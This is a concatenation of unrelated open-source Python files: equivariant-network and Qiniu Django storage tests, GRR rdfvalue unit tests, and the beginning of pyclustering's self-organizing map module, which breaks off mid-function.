gated = FieldType(g, [g.trivial_repr])
self.assertRaises(AssertionError, GatedNonLinearity2, (gates, gated))
def test_dihedral_norm_error(self):
N = 8
g = FlipRot2dOnR2(N)
for r in g.representations.values():
if 'norm' not in r.supported_nonlinearities:
r1 = FieldType(g, [r])
self.assertRaises(AssertionError, NormNonLinearity, r1)
def test_dihedral_pointwise_error(self):
N = 8
g = FlipRot2dOnR2(N)
for r in g.representations.values():
if 'pointwise' not in r.supported_nonlinearities:
r1 = FieldType(g, [r])
self.assertRaises(AssertionError, PointwiseNonLinearity, r1)
def test_dihedral_concat_error(self):
N = 8
g = FlipRot2dOnR2(N)
for r in g.representations.values():
if 'concatenated' not in r.supported_nonlinearities:
r1 = FieldType(g, [r])
self.assertRaises(AssertionError, ConcatenatedNonLinearity, r1)
if __name__ == '__main__':
unittest.main()
|
tests/test_private_storage.py | glasslion/django-qiniu-storage | 209 | 21365 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals, print_function
from datetime import datetime
import os
from os.path import dirname, join
import sys
import time
import unittest
import uuid
import logging
LOGGING_FORMAT = '\n%(levelname)s %(asctime)s %(message)s'
logging.basicConfig(level=logging.INFO, format=LOGGING_FORMAT)
logger = logging.getLogger(__name__)
import six
import django
from requests.exceptions import ConnectionError
from qiniu import BucketManager
from .utils import retry
# Add repo/demo_site to sys.path
DEMO_SITE_DIR = join(dirname(dirname(__file__)), 'demo_site')
sys.path.append(DEMO_SITE_DIR)
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "demo_site.settings")
try:
django.setup()
except AttributeError:
# Setup isn't necessary in Django < 1.7
pass
from django.conf import settings
from qiniustorage.backends import QiniuPrivateStorage, QiniuFile, get_qiniu_config
from qiniustorage.utils import QiniuError
USING_TRAVIS = os.environ.get('USING_TRAVIS', None) is None
UNIQUE_PATH = str(uuid.uuid4())
class QiniuStorageTest(unittest.TestCase):
def setUp(self):
self.storage = QiniuPrivateStorage(
bucket_name=get_qiniu_config('QINIU_PRIVATE_BUCKET_NAME'),
bucket_domain=get_qiniu_config('QINIU_PRIVATE_BUCKET_DOMAIN'),
)
def test_read_file(self):
ASSET_FILE_NAMES = [u'Read.txt', u'读.txt']
for assert_file_name in ASSET_FILE_NAMES:
REMOTE_PATH = join(UNIQUE_PATH, assert_file_name)
test_file = six.BytesIO()
test_file.write(u"你好世界 Hello World".encode('utf-8'))
test_file.seek(0)
self.storage.save(REMOTE_PATH, test_file)
fil = self.storage.open(REMOTE_PATH, 'r')
assert fil._is_read == False
content = fil.read()
assert content.startswith(u"你好")
assert fil._is_read == True
# Test open mode
fil = self.storage.open(REMOTE_PATH, 'rb')
bin_content = fil.read()
assert bin_content.startswith(u"你好".encode('utf-8'))
@classmethod
def teardown_class(cls):
"""Delete all files in the test bucket.
"""
storage = QiniuPrivateStorage(
bucket_name=get_qiniu_config('QINIU_PRIVATE_BUCKET_NAME'),
bucket_domain=get_qiniu_config('QINIU_PRIVATE_BUCKET_DOMAIN'),
)
auth = storage.auth
bucket = BucketManager(auth)
while True:
ret, eof, info = bucket.list(storage.bucket_name, limit=100)
if ret is None:
print(info)
break
for item in ret['items']:
name = item['key']
if six.PY2:
name = name.encode('utf-8')
ret, info = bucket.delete(storage.bucket_name, name)
if ret is None:
print(info)
if eof:
break
|
grr/core/grr_response_core/lib/rdfvalue_test.py | khanhgithead/grr | 4,238 | 21380 | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""Tests for utility classes."""
import datetime
import sys
import unittest
from absl import app
from absl.testing import absltest
from grr_response_core.lib import rdfvalue
from grr.test_lib import test_lib
long_string = (
"迎欢迎\n"
"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Morbi luctus "
"ex sed dictum volutpat. Integer maximus, mauris at tincidunt iaculis, "
"felis magna scelerisque ex, in scelerisque est odio non nunc. "
"Suspendisse et lobortis augue. Donec faucibus tempor massa, sed dapibus"
" erat iaculis ut. Vestibulum eu elementum nulla. Nullam scelerisque "
"hendrerit lorem. Integer vitae semper metus. Suspendisse accumsan "
"dictum felis. Etiam viverra, felis sed ullamcorper vehicula, libero "
"nisl tempus dui, a porta lacus erat et erat. Morbi mattis elementum "
"efficitur. Pellentesque aliquam placerat mauris non accumsan.")
class RDFValueTest(absltest.TestCase):
"""RDFValue tests."""
def testStr(self):
"""Test RDFValue.__str__."""
self.assertEqual(str(rdfvalue.RDFInteger(1)), "1")
self.assertEqual(str(rdfvalue.RDFString(long_string)), long_string)
# TODO(hanuszczak): Current implementation of `repr` for RDF values is broken
# and not in line with Python guidelines. For example, `repr` should be
# unambiguous whereas current implementation will trim long representations
# with `...`. Moreover, the representation for most types is questionable at
# best.
#
# The implementation should be fixed and proper tests should be written.
class RDFBytesTest(absltest.TestCase):
def testFromHumanReadable(self):
string = u"zażółć gęślą jaźń"
result = rdfvalue.RDFBytes.FromHumanReadable(string)
expected = rdfvalue.RDFBytes.FromSerializedBytes(string.encode("utf-8"))
self.assertEqual(result, expected)
class RDFStringTest(absltest.TestCase):
def testFromHumanReadable(self):
string = u"pchnąć w tę łódź jeża lub ośm skrzyń fig"
result = rdfvalue.RDFString.FromHumanReadable(string)
self.assertEqual(str(result), string)
def testEqualWithBytes(self):
self.assertEqual(rdfvalue.RDFString(u"foo"), b"foo")
self.assertNotEqual(rdfvalue.RDFString(u"foo"), b"\x80\x81\x82")
def testLessThanWithBytes(self):
self.assertLess(rdfvalue.RDFString(u"abc"), b"def")
self.assertGreater(rdfvalue.RDFString(u"xyz"), b"ghi")
self.assertLess(rdfvalue.RDFString(u"012"), b"\x80\x81\x81")
# TODO: Python on Windows ships with UCS-2 by default, which does
# not properly support unicode.
@unittest.skipIf(
sys.maxunicode <= 65535,
"Your Python installation does not properly support Unicode (likely: "
"Python with no UCS4 support on Windows.")
def testLenOfEmoji(self):
self.assertLen(rdfvalue.RDFString("🚀🚀"), 2)
class RDFIntegerTest(absltest.TestCase):
def testFromHumanReadable(self):
result = rdfvalue.RDFInteger.FromHumanReadable(u"42")
self.assertEqual(result, rdfvalue.RDFInteger(42))
def testFromHumanReadablePositive(self):
result = rdfvalue.RDFInteger.FromHumanReadable(u"+108")
self.assertEqual(result, rdfvalue.RDFInteger(108))
def testFromHumanReadableNegative(self):
result = rdfvalue.RDFInteger.FromHumanReadable(u"-1337")
self.assertEqual(result, rdfvalue.RDFInteger(-1337))
def testFromHumanReadableZero(self):
result = rdfvalue.RDFInteger.FromHumanReadable(u"0")
self.assertEqual(result, rdfvalue.RDFInteger(0))
def testFromHumanReadableRaisesOnNonInteger(self):
with self.assertRaises(ValueError):
rdfvalue.RDFInteger.FromHumanReadable(u"12.3")
def testFromHumanReadableRaisesOnNonDecimal(self):
with self.assertRaises(ValueError):
rdfvalue.RDFInteger.FromHumanReadable(u"12A")
class RDFDateTimeTest(absltest.TestCase):
def testLerpMiddle(self):
start_time = rdfvalue.RDFDatetime.FromHumanReadable("2010-01-01")
end_time = start_time + rdfvalue.Duration.From(10, rdfvalue.DAYS)
lerped_time = rdfvalue.RDFDatetime.Lerp(
0.5, start_time=start_time, end_time=end_time)
self.assertEqual(lerped_time,
start_time + rdfvalue.Duration.From(5, rdfvalue.DAYS))
def testLerpZero(self):
start_time = rdfvalue.RDFDatetime.FromHumanReadable("2000-01-01")
end_time = rdfvalue.RDFDatetime.FromHumanReadable("2020-01-01")
lerped_time = rdfvalue.RDFDatetime.Lerp(
0.0, start_time=start_time, end_time=end_time)
self.assertEqual(lerped_time, start_time)
def testLerpOne(self):
start_time = rdfvalue.RDFDatetime.FromHumanReadable("2000-01-01")
end_time = rdfvalue.RDFDatetime.FromHumanReadable("2020-01-01")
lerped_time = rdfvalue.RDFDatetime.Lerp(
1.0, start_time=start_time, end_time=end_time)
self.assertEqual(lerped_time, end_time)
def testLerpQuarter(self):
start_time = rdfvalue.RDFDatetime.FromHumanReadable("2000-01-01")
end_time = start_time + rdfvalue.Duration.From(4, rdfvalue.DAYS)
lerped_time = rdfvalue.RDFDatetime.Lerp(
0.25, start_time=start_time, end_time=end_time)
self.assertEqual(lerped_time,
start_time + rdfvalue.Duration.From(1, rdfvalue.DAYS))
def testLerpRaisesTypeErrorIfTimesAreNotRDFDatetime(self):
now = rdfvalue.RDFDatetime.Now()
with self.assertRaisesRegex(TypeError, "non-datetime"):
rdfvalue.RDFDatetime.Lerp(0.0, start_time=10, end_time=now)
with self.assertRaisesRegex(TypeError, "non-datetime"):
rdfvalue.RDFDatetime.Lerp(
0.0,
start_time=now,
end_time=rdfvalue.Duration.From(1, rdfvalue.DAYS))
def testLerpRaisesValueErrorIfProgressIsNotNormalized(self):
start_time = rdfvalue.RDFDatetime.FromHumanReadable("2010-01-01")
end_time = rdfvalue.RDFDatetime.FromHumanReadable("2011-01-01")
with self.assertRaises(ValueError):
rdfvalue.RDFDatetime.Lerp(1.5, start_time=start_time, end_time=end_time)
with self.assertRaises(ValueError):
rdfvalue.RDFDatetime.Lerp(-0.5, start_time=start_time, end_time=end_time)
def testFloorToMinutes(self):
dt = rdfvalue.RDFDatetime.FromHumanReadable("2011-11-11 12:34:56")
expected = rdfvalue.RDFDatetime.FromHumanReadable("2011-11-11 12:34")
self.assertEqual(
dt.Floor(rdfvalue.Duration.From(60, rdfvalue.SECONDS)), expected)
def testFloorToHours(self):
dt = rdfvalue.RDFDatetime.FromHumanReadable("2011-11-11 12:34")
expected = rdfvalue.RDFDatetime.FromHumanReadable("2011-11-11 12:00")
self.assertEqual(
dt.Floor(rdfvalue.Duration.From(1, rdfvalue.HOURS)), expected)
def testFloorToDays(self):
dt = rdfvalue.RDFDatetime.FromHumanReadable("2011-11-11 12:34")
expected = rdfvalue.RDFDatetime.FromHumanReadable("2011-11-11")
self.assertEqual(
dt.Floor(rdfvalue.Duration.From(1, rdfvalue.DAYS)), expected)
def testFloorExact(self):
dt = rdfvalue.RDFDatetime.FromHumanReadable("2011-11-11 12:34:56")
self.assertEqual(dt.Floor(rdfvalue.Duration.From(1, rdfvalue.SECONDS)), dt)
class RDFDatetimeSecondsTest(absltest.TestCase):
def testFromDatetime_withMicroSeconds(self):
dt_with_micros = datetime.datetime(2000, 1, 1, microsecond=5000)
dt = datetime.datetime(2000, 1, 1)
self.assertEqual(
rdfvalue.RDFDatetimeSeconds.FromDatetime(dt_with_micros),
rdfvalue.RDFDatetimeSeconds.FromDatetime(dt))
def testBug122716179(self):
d = rdfvalue.RDFDatetimeSeconds.FromSecondsSinceEpoch(1)
self.assertEqual(d.AsMicrosecondsSinceEpoch(), 1000000)
diff = rdfvalue.RDFDatetimeSeconds(10) - rdfvalue.Duration("3s")
self.assertEqual(diff.AsMicrosecondsSinceEpoch(), 7000000)
class DurationSecondsTest(absltest.TestCase):
def testPublicAttributes(self):
duration = rdfvalue.DurationSeconds.FromHumanReadable("1h")
self.assertEqual(duration.ToInt(rdfvalue.SECONDS), 3600)
self.assertEqual(duration.ToInt(rdfvalue.MILLISECONDS), 3600 * 1000)
self.assertEqual(duration.microseconds, 3600 * 1000 * 1000)
def testFromDays(self):
self.assertEqual(
rdfvalue.DurationSeconds.From(2, rdfvalue.DAYS),
rdfvalue.DurationSeconds.FromHumanReadable("2d"))
self.assertEqual(
rdfvalue.DurationSeconds.From(31, rdfvalue.DAYS),
rdfvalue.DurationSeconds.FromHumanReadable("31d"))
def testFromHours(self):
self.assertEqual(
rdfvalue.DurationSeconds.From(48, rdfvalue.HOURS),
rdfvalue.DurationSeconds.FromHumanReadable("48h"))
self.assertEqual(
rdfvalue.DurationSeconds.From(24, rdfvalue.HOURS),
rdfvalue.DurationSeconds.FromHumanReadable("24h"))
def testFromSeconds(self):
self.assertEqual(
rdfvalue.DurationSeconds.From(1337,
rdfvalue.SECONDS).ToInt(rdfvalue.SECONDS),
1337)
def testFromMicroseconds(self):
duration = rdfvalue.DurationSeconds.From(3000000, rdfvalue.MICROSECONDS)
self.assertEqual(duration.microseconds, 3000000)
self.assertEqual(duration.ToInt(rdfvalue.SECONDS), 3)
def testFloatConstructorRaises(self):
with self.assertRaises(TypeError):
rdfvalue.DurationSeconds(3.14)
def testSerializeToBytes(self):
self.assertEqual(
b"0",
rdfvalue.DurationSeconds.From(0, rdfvalue.WEEKS).SerializeToBytes())
self.assertEqual(
b"1",
rdfvalue.DurationSeconds.From(1, rdfvalue.SECONDS).SerializeToBytes())
self.assertEqual(
b"2",
rdfvalue.DurationSeconds.From(2, rdfvalue.SECONDS).SerializeToBytes())
self.assertEqual(
b"999",
rdfvalue.DurationSeconds.From(999, rdfvalue.SECONDS).SerializeToBytes())
self.assertEqual(
b"1000",
rdfvalue.DurationSeconds.From(1000,
rdfvalue.SECONDS).SerializeToBytes())
def testFromWireFormat(self):
for i in [0, 7, 1337]:
val = rdfvalue.DurationSeconds.FromWireFormat(i)
self.assertEqual(i, val.ToInt(rdfvalue.SECONDS))
val2 = rdfvalue.DurationSeconds.FromWireFormat(
val.SerializeToWireFormat())
self.assertEqual(val, val2)
MAX_UINT64 = 18446744073709551615
class DurationTest(absltest.TestCase):
def testInitializationFromMicroseconds(self):
for i in [0, 1, 7, 60, 1337, MAX_UINT64]:
val = rdfvalue.Duration.From(i, rdfvalue.MICROSECONDS)
self.assertEqual(i, val.microseconds)
self.assertEqual(val,
rdfvalue.Duration.FromHumanReadable("{} us".format(i)))
self.assertEqual(val, rdfvalue.Duration(i))
def testInitializationFromMilliseconds(self):
for i in [0, 1, 7, 60, 1337, MAX_UINT64 // 1000]:
val = rdfvalue.Duration.From(i, rdfvalue.MILLISECONDS)
self.assertEqual(i * 1000, val.microseconds)
self.assertEqual(val,
rdfvalue.Duration.FromHumanReadable("{} ms".format(i)))
def testInitializationFromSeconds(self):
for i in [0, 1, 7, 60, 1337, MAX_UINT64 // 1000000]:
val = rdfvalue.Duration.From(i, rdfvalue.SECONDS)
self.assertEqual(i * 1000000, val.microseconds)
self.assertEqual(val,
rdfvalue.Duration.FromHumanReadable("{} s".format(i)))
def testInitializationFromMinutes(self):
for i in [0, 1, 7, 60, 1337, MAX_UINT64 // 60000000]:
val = rdfvalue.Duration.From(i, rdfvalue.MINUTES)
self.assertEqual(i * 60000000, val.microseconds)
self.assertEqual(val,
rdfvalue.Duration.FromHumanReadable("{} m".format(i)))
def testInitializationFromHours(self):
for i in [0, 1, 7, 60, 1337, MAX_UINT64 // 3600000000]:
val = rdfvalue.Duration.From(i, rdfvalue.HOURS)
self.assertEqual(i * 3600000000, val.microseconds)
self.assertEqual(val,
rdfvalue.Duration.FromHumanReadable("{} h".format(i)))
def testInitializationFromDays(self):
for i in [0, 1, 7, 60, 1337, MAX_UINT64 // 86400000000]:
val = rdfvalue.Duration.From(i, rdfvalue.DAYS)
self.assertEqual(i * 86400000000, val.microseconds)
self.assertEqual(val,
rdfvalue.Duration.FromHumanReadable("{} d".format(i)))
def testInitializationFromWeeks(self):
for i in [0, 1, 7, 60, 1337, MAX_UINT64 // 604800000000]:
val = rdfvalue.Duration.From(i, rdfvalue.WEEKS)
self.assertEqual(i * 604800000000, val.microseconds)
self.assertEqual(val,
rdfvalue.Duration.FromHumanReadable("{} w".format(i)))
def testConversionToInt(self):
for i in [0, 1, 7, 60, 1337, 12345, 123456, 1234567, MAX_UINT64]:
val = rdfvalue.Duration.From(i, rdfvalue.MICROSECONDS)
self.assertEqual(val.ToInt(rdfvalue.MICROSECONDS), i)
self.assertEqual(val.ToInt(rdfvalue.MILLISECONDS), i // 1000)
self.assertEqual(val.ToInt(rdfvalue.SECONDS), i // (1000 * 1000))
self.assertEqual(val.ToInt(rdfvalue.MINUTES), i // (60 * 1000 * 1000))
self.assertEqual(val.ToInt(rdfvalue.HOURS), i // (60 * 60 * 1000 * 1000))
self.assertEqual(
val.ToInt(rdfvalue.DAYS), i // (24 * 60 * 60 * 1000 * 1000))
self.assertEqual(
val.ToInt(rdfvalue.WEEKS), i // (7 * 24 * 60 * 60 * 1000 * 1000))
def testConversionToFractional(self):
for i in [0, 1, 7, 60, 1337, 12345, 123456, 1234567, MAX_UINT64]:
val = rdfvalue.Duration.From(i, rdfvalue.MICROSECONDS)
self.assertAlmostEqual(val.ToFractional(rdfvalue.MICROSECONDS), i)
self.assertAlmostEqual(val.ToFractional(rdfvalue.MILLISECONDS), i / 1000)
self.assertAlmostEqual(
val.ToFractional(rdfvalue.SECONDS), i / (1000 * 1000))
self.assertAlmostEqual(
val.ToFractional(rdfvalue.MINUTES), i / (60 * 1000 * 1000))
self.assertAlmostEqual(
val.ToFractional(rdfvalue.HOURS), i / (60 * 60 * 1000 * 1000))
self.assertAlmostEqual(
val.ToFractional(rdfvalue.DAYS), i / (24 * 60 * 60 * 1000 * 1000))
self.assertAlmostEqual(
val.ToFractional(rdfvalue.WEEKS),
i / (7 * 24 * 60 * 60 * 1000 * 1000))
def testStringDeserialization(self):
for i in [0, 1, 7, 60, 1337, 12345, 123456, 1234567, MAX_UINT64]:
val = rdfvalue.Duration.From(i, rdfvalue.MICROSECONDS)
self.assertEqual(
rdfvalue.Duration.FromSerializedBytes(val.SerializeToBytes()), val)
def testHumanReadableStringSerialization(self):
self.assertEqual("0 us", str(rdfvalue.Duration.From(0, rdfvalue.WEEKS)))
self.assertEqual("1 us",
str(rdfvalue.Duration.From(1, rdfvalue.MICROSECONDS)))
self.assertEqual("2 us",
str(rdfvalue.Duration.From(2, rdfvalue.MICROSECONDS)))
self.assertEqual("999 us",
str(rdfvalue.Duration.From(999, rdfvalue.MICROSECONDS)))
self.assertEqual("1 ms",
str(rdfvalue.Duration.From(1000, rdfvalue.MICROSECONDS)))
self.assertEqual("1 ms",
str(rdfvalue.Duration.From(1, rdfvalue.MILLISECONDS)))
self.assertEqual(
"{} us".format(MAX_UINT64),
str(rdfvalue.Duration.From(MAX_UINT64, rdfvalue.MICROSECONDS)))
self.assertEqual("3 s", str(rdfvalue.Duration.From(3, rdfvalue.SECONDS)))
self.assertEqual("3 m", str(rdfvalue.Duration.From(3, rdfvalue.MINUTES)))
self.assertEqual("3 h", str(rdfvalue.Duration.From(3, rdfvalue.HOURS)))
self.assertEqual("3 d", str(rdfvalue.Duration.From(3, rdfvalue.DAYS)))
self.assertEqual("3 w", str(rdfvalue.Duration.From(21, rdfvalue.DAYS)))
def testSerializeToBytes(self):
self.assertEqual(
b"0",
rdfvalue.Duration.From(0, rdfvalue.WEEKS).SerializeToBytes())
self.assertEqual(
b"1",
rdfvalue.Duration.From(1, rdfvalue.MICROSECONDS).SerializeToBytes())
self.assertEqual(
b"2",
rdfvalue.Duration.From(2, rdfvalue.MICROSECONDS).SerializeToBytes())
self.assertEqual(
b"999",
rdfvalue.Duration.From(999, rdfvalue.MICROSECONDS).SerializeToBytes())
self.assertEqual(
b"1000",
rdfvalue.Duration.From(1000, rdfvalue.MICROSECONDS).SerializeToBytes())
self.assertEqual(
str(MAX_UINT64).encode("utf-8"),
rdfvalue.Duration.From(MAX_UINT64,
rdfvalue.MICROSECONDS).SerializeToBytes())
self.assertEqual(
b"3000000",
rdfvalue.Duration.From(3, rdfvalue.SECONDS).SerializeToBytes())
def testAdditionOfDurationsIsEqualToIntegerAddition(self):
for a in [0, 1, 7, 60, 1337, MAX_UINT64 // 2]:
for b in [0, 1, 7, 60, 1337, MAX_UINT64 // 2]:
self.assertEqual(
rdfvalue.Duration(a) + rdfvalue.Duration(b),
rdfvalue.Duration(a + b))
def testSubtractionOfDurationsIsEqualToIntegerSubtraction(self):
for a in [0, 1, 7, 60, 1337, MAX_UINT64]:
for b in [0, 1, 7, 60, 1337, MAX_UINT64]:
self.assertEqual(
rdfvalue.Duration(a) - rdfvalue.Duration(min(a, b)),
rdfvalue.Duration(a - min(a, b)))
def testFromWireFormat(self):
for i in [0, 7, 1337, MAX_UINT64]:
val = rdfvalue.Duration.FromWireFormat(i)
self.assertEqual(i, val.microseconds)
def testSubtractionFromDateTimeIsEqualToIntegerSubtraction(self):
for a in [0, 1, 7, 60, 1337]:
for b in [0, 1, 7, 60, 1337]:
lhs = rdfvalue.RDFDatetime.FromMicrosecondsSinceEpoch(a)
rhs = rdfvalue.Duration(min(a, b))
result = lhs - rhs
self.assertEqual(result.AsMicrosecondsSinceEpoch(), a - min(a, b))
def testAdditionToDateTimeIsEqualToIntegerAddition(self):
for a in [0, 1, 7, 60, 1337]:
for b in [0, 1, 7, 60, 1337]:
lhs = rdfvalue.RDFDatetime.FromMicrosecondsSinceEpoch(a)
rhs = rdfvalue.Duration(b)
result = lhs + rhs
self.assertEqual(result.AsMicrosecondsSinceEpoch(), a + b)
def testComparisonIsEqualToIntegerComparison(self):
for a in [0, 1, 7, 60, 1337, MAX_UINT64 - 1, MAX_UINT64]:
for b in [0, 1, 7, 60, 1337, MAX_UINT64 - 1, MAX_UINT64]:
dur_a = rdfvalue.Duration(a)
dur_b = rdfvalue.Duration(b)
if a > b:
self.assertGreater(dur_a, dur_b)
if a >= b:
self.assertGreaterEqual(dur_a, dur_b)
if a == b:
self.assertEqual(dur_a, dur_b)
if a <= b:
self.assertLessEqual(dur_a, dur_b)
if a < b:
self.assertLess(dur_a, dur_b)
if a != b:
self.assertNotEqual(dur_a, dur_b)
class DocTest(test_lib.DocTest):
module = rdfvalue
def main(argv):
test_lib.main(argv)
if __name__ == "__main__":
app.run(main)
|
pyclustering/nnet/som.py | JosephChataignon/pyclustering | 1,013 | 21403 | """!
@brief Neural Network: Self-Organized Feature Map
@details Implementation based on paper @cite article::nnet::som::1, @cite article::nnet::som::2.
@authors <NAME> (<EMAIL>)
@date 2014-2020
@copyright BSD-3-Clause
"""
import math
import random
import matplotlib.pyplot as plt
import pyclustering.core.som_wrapper as wrapper
from pyclustering.core.wrapper import ccore_library
from pyclustering.utils import euclidean_distance_square
from pyclustering.utils.dimension import dimension_info
from enum import IntEnum
class type_conn(IntEnum):
"""!
@brief Enumeration of connection types for SOM.
@see som
"""
## Grid type of connections when each oscillator has connections with left, upper, right, lower neighbors.
grid_four = 0
## Grid type of connections when each oscillator has connections with left, upper-left, upper, upper-right, right, right-lower, lower, lower-left neighbors.
grid_eight = 1
## Grid type of connections when each oscillator has connections with left, upper-left, upper-right, right, right-lower, lower-left neighbors.
honeycomb = 2
## Grid type of connections when existance of each connection is defined by the SOM rule on each step of simulation.
func_neighbor = 3
class type_init(IntEnum):
"""!
@brief Enumeration of initialization types for SOM.
@see som
"""
## Weights are randomly distributed using Gaussian distribution (0, 1).
random = 0
## Weights are randomly distributed using Gaussian distribution (input data centroid, 1).
random_centroid = 1
## Weights are randomly distrbiuted using Gaussian distribution (input data centroid, surface of input data).
random_surface = 2
## Weights are distributed as a uniform grid that covers whole surface of the input data.
uniform_grid = 3
class som_parameters:
"""!
@brief Represents SOM parameters.
"""
def __init__(self):
"""!
@brief Creates SOM parameters.
"""
## Defines an initialization way for neuron weights (random, random in center of the input data, random distributed in data, ditributed in line with uniform grid).
self.init_type = type_init.uniform_grid
## Initial radius. If the initial radius is not specified (equals to `None`) then it will be calculated by SOM.
self.init_radius = None
## Rate of learning.
self.init_learn_rate = 0.1
## Condition that defines when the learining process should be stopped. It is used when the autostop mode is on.
self.adaptation_threshold = 0.001
## Seed for random state (by default is `None`, current system time is used).
self.random_state = None
class som:
"""!
@brief Represents self-organized feature map (SOM).
@details The self-organizing feature map (SOM) method is a powerful tool for the visualization of
of high-dimensional data. It converts complex, nonlinear statistical relationships between
high-dimensional data into simple geometric relationships on a low-dimensional display.
@details `ccore` option can be specified in order to control using C++ implementation of pyclustering library. By
default C++ implementation is on. C++ implementation improves performance of the self-organized feature
map.
Example:
@code
import random
from pyclustering.utils import read_sample
from pyclustering.nnet.som import som, type_conn, type_init, som_parameters
from pyclustering.samples.definitions import FCPS_SAMPLES
# read sample 'Lsun' from file
sample = read_sample(FCPS_SAMPLES.SAMPLE_LSUN)
# create SOM parameters
parameters = som_parameters()
# create self-organized feature map with size 7x7
rows = 10 # five rows
cols = 10 # five columns
structure = type_conn.grid_four; # each neuron has max. four neighbors.
network = som(rows, cols, structure, parameters)
# train network on 'Lsun' sample during 100 epouchs.
network.train(sample, 100)
# simulate trained network using randomly modified point from input dataset.
index_point = random.randint(0, len(sample) - 1)
point = sample[index_point] # obtain randomly point from data
point[0] += random.random() * 0.2 # change randomly X-coordinate
point[1] += random.random() * 0.2 # change randomly Y-coordinate
index_winner = network.simulate(point)
# check what are objects from input data are much close to randomly modified.
index_similar_objects = network.capture_objects[index_winner]
# neuron contains information of encoded objects
print("Point '%s' is similar to objects with indexes '%s'." % (str(point), str(index_similar_objects)))
print("Coordinates of similar objects:")
for index in index_similar_objects: print("\tPoint:", sample[index])
# result visualization:
# show distance matrix (U-matrix).
network.show_distance_matrix()
# show density matrix (P-matrix).
network.show_density_matrix()
# show winner matrix.
network.show_winner_matrix()
# show self-organized map.
network.show_network()
@endcode
There is a visualization of 'Target' sample that was done by the self-organized feature map:
@image html target_som_processing.png
"""
@property
def size(self):
"""!
@brief Return size of self-organized map that is defined by total number of neurons.
@return (uint) Size of self-organized map (number of neurons).
"""
if self.__ccore_som_pointer is not None:
self._size = wrapper.som_get_size(self.__ccore_som_pointer)
return self._size
@property
def weights(self):
"""!
@brief Return weight of each neuron.
@return (list) Weights of each neuron.
"""
if self.__ccore_som_pointer is not None:
self._weights = wrapper.som_get_weights(self.__ccore_som_pointer)
return self._weights
@property
def awards(self):
"""!
@brief Return amount of captured objects by each neuron after training.
@return (list) Amount of captured objects by each neuron.
@see train()
"""
if self.__ccore_som_pointer is not None:
self._award = wrapper.som_get_awards(self.__ccore_som_pointer)
return self._award
@property
def capture_objects(self):
"""!
@brief Returns indexes of captured objects by each neuron.
@details For example, a network with size 2x2 has been trained on a sample with five objects. Suppose neuron #1
won an object with index `1`, neuron #2 won objects `0`, `3`, `4`, neuron #3 did not won anything and
finally neuron #4 won an object with index `2`. Thus, for this example we will have the following
output `[[1], [0, 3, 4], [], [2]]`.
@return (list) Indexes of captured objects by each neuron.
"""
if self.__ccore_som_pointer is not None:
self._capture_objects = wrapper.som_get_capture_objects(self.__ccore_som_pointer)
return self._capture_objects
def __init__(self, rows, cols, conn_type=type_conn.grid_eight, parameters=None, ccore=True):
"""!
@brief Constructor of self-organized map.
@param[in] rows (uint): Number of neurons in the column (number of rows).
@param[in] cols (uint): Number of neurons in the row (number of columns).
@param[in] conn_type (type_conn): Type of connection between oscillators in the network (grid four, grid eight, honeycomb, function neighbour).
@param[in] parameters (som_parameters): Other specific parameters.
@param[in] ccore (bool): If True simulation is performed by CCORE library (C++ implementation of pyclustering).
"""
# some of these parameters are required despite core implementation, for example, for network visualization.
self._cols = cols
self._rows = rows
self._size = cols * rows
self._conn_type = conn_type
self._data = None
self._neighbors = None
self._local_radius = 0.0
self._learn_rate = 0.0
self.__ccore_som_pointer = None
self._params = parameters or som_parameters()
if self._params.init_radius is None:
self._params.init_radius = self.__initialize_initial_radius(rows, cols)
if (ccore is True) and ccore_library.workable():
self.__ccore_som_pointer = wrapper.som_create(rows, cols, conn_type, self._params)
else:
# location
self._location = self.__initialize_locations(rows, cols)
# default weights
self._weights = [[0.0]] * self._size
# awards
self._award = [0] * self._size
# captured objects
self._capture_objects = [[] for i in range(self._size)]
# distances - calculate and store them only during training
self._sqrt_distances = None
# connections
if conn_type != type_conn.func_neighbor:
self._create_connections(conn_type)
def __del__(self):
"""!
@brief Destructor of the self-organized feature map.
"""
if self.__ccore_som_pointer is not None:
wrapper.som_destroy(self.__ccore_som_pointer)
def __len__(self):
"""!
@brief Returns size of the network that defines by amount of neuron in it.
@return (uint) Size of self-organized map (amount of neurons).
"""
return self._size
def __getstate__(self):
"""
@brief Returns state of SOM network that can be used to store network.
"""
if self.__ccore_som_pointer is not None:
self.__download_dump_from_ccore()
return self.__get_dump_from_python(True)
return self.__get_dump_from_python(False)
def __setstate__(self, som_state):
"""
@brief Set state of SOM network that can be used to load network.
"""
if som_state['ccore'] is True and ccore_library.workable():
self.__upload_dump_to_ccore(som_state['state'])
else:
self.__upload_dump_to_python(som_state['state'])
def __initialize_initial_radius(self, rows, cols):
"""!
@brief Initialize initial radius using map sizes.
@param[in] rows (uint): Number of neurons in the column (number of rows).
@param[in] cols (uint): Number of neurons in the row (number of columns).
@return (list) Value of initial radius.
"""
if (cols + rows) / 4.0 > 1.0:
return 2.0
elif (cols > 1) and (rows > 1):
return 1.5
else:
return 1.0
def __initialize_locations(self, rows, cols):
"""!
@brief Initialize locations (coordinates in SOM grid) of each neurons in the map.
@param[in] rows (uint): Number of neurons in the column (number of rows).
@param[in] cols (uint): Number of neurons in the row (number of columns).
@return (list) List of coordinates of each neuron in map.
"""
location = list()
for i in range(rows):
for j in range(cols):
location.append([float(i), float(j)])
return location
def __initialize_distances(self, size, location):
"""!
@brief Initialize distance matrix in SOM grid.
@param[in] size (uint): Amount of neurons in the network.
@param[in] location (list): List of coordinates of each neuron in the network.
@return (list) Distance matrix between neurons in the network.
"""
sqrt_distances = [[[] for i in range(size)] for j in range(size)]
for i in range(size):
for j in range(i, size, 1):
dist = euclidean_distance_square(location[i], location[j])
sqrt_distances[i][j] = dist
sqrt_distances[j][i] = dist
return sqrt_distances
def _create_initial_weights(self, init_type):
"""!
@brief Creates initial weights for neurons in line with the specified initialization.
@param[in] init_type (type_init): Type of initialization of initial neuron weights (random, random in center of the input data, random distributed in data, ditributed in line with uniform grid).
"""
dim_info = dimension_info(self._data)
step_x = dim_info.get_center()[0]
if self._rows > 1:
step_x = dim_info.get_width()[0] / (self._rows - 1)
step_y = 0.0
if dim_info.get_dimensions() > 1:
step_y = dim_info.get_center()[1]
if self._cols > 1:
step_y = dim_info.get_width()[1] / (self._cols - 1)
# generate weights (topological coordinates)
random.seed(self._params.random_state)
# Uniform grid.
